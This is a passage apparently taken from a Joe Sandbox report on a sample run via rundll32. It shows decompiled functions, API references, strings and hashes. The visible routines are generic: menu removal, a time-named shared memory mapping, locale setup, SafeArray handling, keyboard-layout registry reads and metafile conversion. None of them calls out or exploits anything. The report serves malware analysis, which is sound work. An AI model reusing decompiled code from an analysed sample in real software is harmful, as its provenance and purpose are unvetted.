								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x00e4412f
0x00e44139
0x00e44142
0x00e4414c
0x00e44155
0x00e4415f
0x00e44178
0x00e44187
0x00e44191
0x00e4419e
0x00e441ab
0x00e441b8
0x00e441c5
0x00e441d2
0x00000000
0x00e441df
0x00e441f3
0x00e441fd
0x00e441fd
0x00e44205
0x00e4420f
0x00000000
0x00e44219
0x00e4420f
0x00e4415f
0x00e4414c
0x00e44220

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00E44173
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00E44191
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00E4419E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00E441AB
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00E441B8
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00E441C5
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00E441D2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00E441DF
EnableMenuItem.USER32 ref: 00E441FD
EnableMenuItem.USER32 ref: 00E44219

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 81f4901d7ede723e1163a8eda95c3a797ef0f0db54d8a2dc5d854a128f2a7103
Instruction ID: 27c48618a4085a110792512c74545f90dfa703b3bfcdddb55b684ff8f195b9ca
Opcode Fuzzy Hash: 81f4901d7ede723e1163a8eda95c3a797ef0f0db54d8a2dc5d854a128f2a7103
Instruction Fuzzy Hash: 4D215EB03803547BE3209B64DC8EFD97BD95B04B19F1560A0BA587F2E3CAB4A9C08618

Uniqueness

Uniqueness Score: -1.00%

Function 010819C6 Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010819C6(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L010821F0();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10841d0;
				_push(_t15 + 0x108505e);
				_push(_t15 + 0x1085054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L010821EA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x10841c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x010819c6
0x010819cf
0x010819d3
0x010819d9
0x010819de
0x010819e3
0x010819e6
0x010819e9
0x010819ee
0x010819ef
0x010819f2
0x010819fd
0x01081a04
0x01081a08
0x01081a0a
0x01081a0b
0x01081a0e
0x01081a13
0x01081a1d
0x01081a1f
0x01081a1f
0x01081a39
0x01081a3d
0x01081a8d
0x01081a3f
0x01081a48
0x01081a5e
0x01081a66
0x01081a78
0x01081a7c
0x00000000
0x00000000
0x01081a68
0x01081a6b
0x01081a70
0x01081a72
0x01081a72
0x01081a53
0x01081a55
0x01081a7e
0x01081a7f
0x01081a7f
0x01081a48
0x01081a95

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?,?), ref: 010819D3
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010819E9
_snwprintf.NTDLL ref: 01081A0E
CreateFileMappingW.KERNEL32(000000FF,010841C0,00000004,00000000,?,?), ref: 01081A33
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?), ref: 01081A4A
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 01081A5E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?), ref: 01081A76
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A), ref: 01081A7F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?), ref: 01081A87

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 32601516d908a0ed92cbb2ae5b5aea976662e37b2e5b8603a893babb8720dd4e
Instruction ID: fbbb740c91e597ebde892ce6a5cde19087c934587e98cf579e224077b5339089
Opcode Fuzzy Hash: 32601516d908a0ed92cbb2ae5b5aea976662e37b2e5b8603a893babb8720dd4e
Instruction Fuzzy Hash: 4721B672608104BFDB21AFA8DC84EEEBBE9EF48750F104075F6D5DB140D63599068B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E1CA64 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E1CA64(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0xe1cd2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E00E1C8F0();
				E00E1B1F8(__ebx, __edi, __esi);
				_t196 =  *0xe7f750;
				if( *0xe7f750 != 0) {
					E00E1B3D0(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00E1B148(_t43, 0, 0x14,  &_v20);
				E00E140BC(0xe7f684, _v20);
				E00E1B148(_t43, 0xe1cd44, 0x1b,  &_v24);
				 *0xe7f688 = E00E183E8(0xe1cd44, 0, _t196);
				E00E1B148(_t132, 0xe1cd44, 0x1c,  &_v28);
				 *0xe7f689 = E00E183E8(0xe1cd44, 0, _t196);
				 *0xe7f68a = E00E1B194(_t132, 0x2c, 0xf);
				 *0xe7f68b = E00E1B194(_t132, 0x2e, 0xe);
				E00E1B148(_t132, 0xe1cd44, 0x19,  &_v32);
				 *0xe7f68c = E00E183E8(0xe1cd44, 0, _t196);
				 *0xe7f68d = E00E1B194(_t132, 0x2f, 0x1d);
				E00E1B148(_t132, "m/d/yy", 0x1f,  &_v40);
				E00E1B480(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00E140BC(0xe7f690, _v36);
				E00E1B148(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00E1B480(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00E140BC(0xe7f694, _v44);
				 *0xe7f698 = E00E1B194(_t132, 0x3a, 0x1e);
				E00E1B148(_t132, 0xe1cd78, 0x28,  &_v52);
				E00E140BC(0xe7f69c, _v52);
				E00E1B148(_t132, 0xe1cd84, 0x29,  &_v56);
				E00E140BC(0xe7f6a0, _v56);
				E00E14068( &_v12);
				E00E14068( &_v16);
				E00E1B148(_t132, 0xe1cd44, 0x25,  &_v60);
				_t104 = E00E183E8(0xe1cd44, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00E14100( &_v8, 0xe1cd9c);
				} else {
					E00E14100( &_v8, 0xe1cd90);
				}
				E00E1B148(_t132, 0xe1cd44, 0x23,  &_v64);
				_t111 = E00E183E8(0xe1cd44, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00E1B148(_t132, 0xe1cd44, 0x1005,  &_v68);
					if(E00E183E8(0xe1cd44, 0, _t198) != 0) {
						E00E14100( &_v12, 0xe1cdb8);
					} else {
						E00E14100( &_v16, 0xe1cda8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00E143E8();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00E143E8();
				 *0xe7f752 = E00E1B194(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(0xe1cd36);
				return E00E1408C( &_v68, 0x10);
			}

0x00e1ca64
0x00e1ca64
0x00e1ca65
0x00e1ca67
0x00e1ca6c
0x00e1ca6c
0x00e1ca6e
0x00e1ca70
0x00e1ca70
0x00e1ca73
0x00e1ca76
0x00e1ca77
0x00e1ca7c
0x00e1ca7f
0x00e1ca82
0x00e1ca87
0x00e1ca8c
0x00e1ca93
0x00e1ca95
0x00e1ca95
0x00e1ca9f
0x00e1caae
0x00e1cabb
0x00e1cad0
0x00e1cadf
0x00e1caf4
0x00e1cb03
0x00e1cb16
0x00e1cb29
0x00e1cb3e
0x00e1cb4d
0x00e1cb60
0x00e1cb75
0x00e1cb80
0x00e1cb8d
0x00e1cba2
0x00e1cbad
0x00e1cbba
0x00e1cbcd
0x00e1cbe2
0x00e1cbef
0x00e1cc04
0x00e1cc11
0x00e1cc19
0x00e1cc21
0x00e1cc36
0x00e1cc40
0x00e1cc45
0x00e1cc47
0x00e1cc60
0x00e1cc49
0x00e1cc51
0x00e1cc51
0x00e1cc75
0x00e1cc7f
0x00e1cc84
0x00e1cc86
0x00e1cc98
0x00e1cca9
0x00e1ccc2
0x00e1ccab
0x00e1ccb3
0x00e1ccb3
0x00e1cca9
0x00e1ccc7
0x00e1ccca
0x00e1cccd
0x00e1ccd2
0x00e1ccdf
0x00e1cce4
0x00e1cce7
0x00e1ccea
0x00e1ccef
0x00e1ccfc
0x00e1cd0f
0x00e1cd16
0x00e1cd19
0x00e1cd1c
0x00e1cd2e

APIs

GetThreadLocale.KERNEL32(00000000,00E1CD2F,?,?,00000000,00000000), ref: 00E1CA9A

Part of subcall function 00E1B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00E1B166

Strings

m/d/yy, xrefs: 00E1CB69
:mm, xrefs: 00E1CCCD
mmmm d, yyyy, xrefs: 00E1CB96
AMPM, xrefs: 00E1CCAE
:mm:ss, xrefs: 00E1CCEA
AMPM , xrefs: 00E1CCBD

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 87ac2d038348992bb618a0ee8a4471a47c2d45dca8575bbff865b30ba1a53fce
Instruction ID: e1f53eb8f607ed351a465ee4c77c26a8e39b562b3867c50f1d8b8f5b4096933b
Opcode Fuzzy Hash: 87ac2d038348992bb618a0ee8a4471a47c2d45dca8575bbff865b30ba1a53fce
Instruction Fuzzy Hash: B5616D70B41248ABDB01EBE4DC92ADE76E6AB88300F61B439F101FB356CA34D9C58751

Uniqueness

Uniqueness Score: -1.00%

Function 00E1F04C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E1F04C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00E1EBF4(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L00E1D9A8();
					return E00E1EBF4(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L00E1DDFC();
						_t113 = _t54;
						if(_t113 == 0) {
							E00E1E94C(_t100);
						}
						E00E1EFA4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00E1EFC0(_v788 - 1, _t115) != 0) {
								L00E1DE14();
								E00E1EBF4(_v792);
								L00E1DE14();
								E00E1EBF4( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00E1EFF0(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L00E1DE04();
							E00E1EBF4(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L00E1DE0C();
							E00E1EBF4(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}

0x00e1f04c
0x00e1f058
0x00e1f05e
0x00e1f060
0x00e1f06a
0x00e1f071
0x00e1f071
0x00e1f076
0x00e1f084
0x00e1f1fd
0x00e1f204
0x00e1f205
0x00000000
0x00e1f08a
0x00e1f08d
0x00e1f09f
0x00e1f08f
0x00e1f094
0x00e1f094
0x00e1f0ae
0x00e1f0ba
0x00e1f0bd
0x00e1f12a
0x00e1f130
0x00e1f131
0x00e1f137
0x00e1f138
0x00e1f13a
0x00e1f13f
0x00e1f143
0x00e1f145
0x00e1f145
0x00e1f150
0x00e1f15b
0x00e1f166
0x00e1f16f
0x00e1f172
0x00e1f18e
0x00e1f195
0x00e1f1a0
0x00e1f1b7
0x00e1f1bc
0x00e1f1d0
0x00e1f1d5
0x00e1f1e8
0x00e1f1e8
0x00e1f1f1
0x00e1f174
0x00e1f174
0x00e1f175
0x00e1f17b
0x00e1f181
0x00e1f183
0x00e1f185
0x00e1f188
0x00e1f18b
0x00e1f18b
0x00e1f18e
0x00000000
0x00000000
0x00000000
0x00e1f18e
0x00e1f0bf
0x00e1f0bf
0x00e1f0c0
0x00e1f0c2
0x00e1f0c8
0x00e1f0ca
0x00e1f0d9
0x00e1f0da
0x00e1f0e4
0x00e1f0e5
0x00e1f0ea
0x00e1f0f5
0x00e1f0f6
0x00e1f100
0x00e1f101
0x00e1f106
0x00e1f121
0x00e1f123
0x00e1f124
0x00e1f127
0x00e1f127
0x00000000
0x00e1f0c8
0x00e1f0bd

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00E1F0E5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00E1F101
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00E1F13A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00E1F1B7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00E1F1D0
VariantCopy.OLEAUT32(?), ref: 00E1F205

Strings

, xrefs: 00E1F066

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
Instruction ID: 35f13afba6be8373dcef73d38e6efc5042855b35e92b6922dbeeac169ca89a5a
Opcode Fuzzy Hash: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
Instruction Fuzzy Hash: E151E775A056299BCB26DB58CC81AD9B3FCAF4C304F0451E5F909E7212DA34AFC58FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E4666C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E4666C(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0xe46817);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0xe4681e);
					return E00E14068( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00E13244(1);
					E00E14068(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00E28DF8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00E61A38( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00E18FD0( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0xe467d3);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00E142D8( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00E142D8(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0xe467da);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x00e4666c
0x00e4666d
0x00e4666f
0x00e46678
0x00e4667e
0x00e46683
0x00e46684
0x00e46689
0x00e4668c
0x00e46696
0x00e467f8
0x00e46800
0x00e46803
0x00e46806
0x00e46816
0x00e4669c
0x00e466ab
0x00e466b4
0x00e466c7
0x00e466ca
0x00e467e7
0x00e467ed
0x00e467f3
0x00000000
0x00e466d0
0x00e466d1
0x00e466da
0x00e466dd
0x00e466e9
0x00000000
0x00e466ef
0x00e46701
0x00e46707
0x00e46731
0x00000000
0x00e46737
0x00e46739
0x00e4673a
0x00e4673f
0x00e46742
0x00e46745
0x00e4676b
0x00e4677e
0x00e46796
0x00e467a4
0x00e467b7
0x00e467b7
0x00e467a4
0x00e467be
0x00e467c1
0x00e467c4
0x00e467d2
0x00e467d2
0x00e46731
0x00000000
0x00e467da
0x00e467da
0x00e467de
0x00e467de
0x00e467de
0x00000000
0x00e466dd
0x00e466ca
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00E46817,?,00F01458,?,00E46879,00000000,?,00E58E1B), ref: 00E466C2
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00E4672A
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00E467D3,?,80000002,00000000), ref: 00E46764
RegCloseKey.ADVAPI32(?,00E467DA,00000000,?,00000100,00000000,00E467D3,?,80000002,00000000), ref: 00E467CD

Strings

layout text, xrefs: 00E4675B
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00E46714
|Q, xrefs: 00E4669E

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text$|Q
API String ID: 1703357764-2077285645
Opcode ID: 811db18702c71f09efce92346ffa65b08541007719153c2b95fe91c0c2e0fbf7
Instruction ID: 300d2ee2b32f8eedb76f2c1b29a281f8e749bd2e67e7b762b112993f9c5f3f84
Opcode Fuzzy Hash: 811db18702c71f09efce92346ffa65b08541007719153c2b95fe91c0c2e0fbf7
Instruction Fuzzy Hash: CD416674A00208AFDB10DFA4C985BEEB7F8EB49704F9150A5E904F7351D770AE44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E33414 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E33414(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00E332B0(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00E31EBC( &_v38) != _v18) {
					E00E3106C();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00E126CC(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0xe33583, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00E3106C();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00E3106C();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0xe3358a);
				return E00E126EC(_v16);
			}

0x00e33415
0x00e33417
0x00e33420
0x00e33423
0x00e33426
0x00e3342a
0x00e3343c
0x00e33446
0x00e33456
0x00e33456
0x00e3345b
0x00e33467
0x00e3346a
0x00e33478
0x00e33486
0x00e33490
0x00e33499
0x00e3349b
0x00e3349b
0x00e334bb
0x00e334d8
0x00e334db
0x00e334e4
0x00e334e9
0x00e334ee
0x00e33504
0x00e33506
0x00e3350b
0x00e3350d
0x00e3350d
0x00e3351f
0x00e33524
0x00e3352e
0x00e33534
0x00e33539
0x00e33540
0x00e33558
0x00e3355a
0x00e3355f
0x00e33561
0x00e33561
0x00e33566
0x00e3356c
0x00e3356f
0x00e33572
0x00e33582

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00E334B6
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00E334D3
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00E334FF
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00E3351F
DeleteEnhMetaFile.GDI32(00000016), ref: 00E33540
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00E33553

Strings

`, xrefs: 00E3349B

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: aba5534ba10daf67bc5541eac5714ff0c8bdadbafdac474b4ff28a9d1da7d6b6
Instruction ID: fd7dade5cc6e44837844e471fd50950d82eb67deb51a0cf3350a64b004e93fed
Opcode Fuzzy Hash: aba5534ba10daf67bc5541eac5714ff0c8bdadbafdac474b4ff28a9d1da7d6b6
Instruction Fuzzy Hash: 1441FAB5E00208AFDB00DFA8C885AAEBBF9EF48710F119559F904FB245E7359E40CB64

Uniqueness

Uniqueness Score: -1.00%

